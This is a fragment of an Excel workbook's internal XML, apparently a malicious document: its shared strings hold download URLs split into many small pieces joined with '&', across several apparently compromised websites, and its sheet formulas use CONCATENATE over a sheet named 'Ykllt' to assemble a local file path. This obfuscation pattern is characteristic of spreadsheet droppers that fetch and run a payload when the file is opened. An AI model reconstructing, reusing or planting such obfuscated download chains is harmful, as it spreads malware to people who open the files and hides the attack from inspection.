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ZV\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CBC6316A-D4F1-4DB5-B1A3-3C0B1007541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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20" uniqueCount="20">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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a"&amp;"l-b"&amp;"ri"&amp;"k.c"&amp;"o"&amp;"m/v"&amp;"b/p"&amp;"jD6"&amp;"kXT"&amp;"7"&amp;"9J"&amp;"Bgd"&amp;"qhtgB"&amp;"U/","</t>
  </si>
  <si>
    <t>a"&amp;"li"&amp;"c"&amp;"eh"&amp;"ui.c"&amp;"o"&amp;"m/p"&amp;"ic"&amp;"s/yjG"&amp;"o"&amp;"0P"&amp;"rY/","</t>
  </si>
  <si>
    <t>a"&amp;"lb"&amp;"as"&amp;"si"&amp;"ri"&amp;"a.m"&amp;"a/E"&amp;"hT0"&amp;"Yl"&amp;"EA"&amp;"F7/Xs"&amp;"m"&amp;"BC"&amp;"t/","</t>
  </si>
  <si>
    <t>v"&amp;"ik"&amp;"a.p"&amp;"l/b"&amp;"ack"&amp;"up/Q"&amp;"4b"&amp;"Ajo"&amp;"d4"&amp;"QK"&amp;"E6"&amp;"ep"&amp;"p/","</t>
  </si>
  <si>
    <t>a"&amp;"nd"&amp;"is"&amp;"o.d"&amp;"k/lim"&amp;"n"&amp;"y/2"&amp;"ZT"&amp;"m"&amp;"q/","</t>
  </si>
  <si>
    <t>w"&amp;"w"&amp;"w.im"&amp;"pa"&amp;"ct"&amp;"a"&amp;"d.c"&amp;"o.k"&amp;"r/i"&amp;"ma"&amp;"ge"&amp;"s/ED"&amp;"ltK"&amp;"gE5"&amp;"p/","</t>
  </si>
  <si>
    <t>b"&amp;"ab"&amp;"yl"&amp;"ee.c"&amp;"l/si"&amp;"t"&amp;"e/sT"&amp;"B"&amp;"Iv2"&amp;"1"&amp;"f/","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</si>
</sst>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L5" sqref="L5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sqref="A1:XFD1048576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8" workbookViewId="0">
      <selection activeCell="L22" sqref="L22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C13" sqref="C13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CONCATENATE(Ykllt!P19,Ykllt!P5,Ykllt!P5,Ykllt!P3,Ykllt!F10,Ykllt!D7,Ykllt!C3,Ykllt!B5)</f>
        <v xml:space="preserve"> ..\wnru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CONCATENATE(Ykllt!P5,Ykllt!P5,Ykllt!P3,Ykllt!F10,Ykllt!D7,Ykllt!C3,Ykllt!B5,)</f>
        <v>..\wnru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2022-03-18T09:44:35Z</dcterms:modified>
</cp:coreProperties>
</file>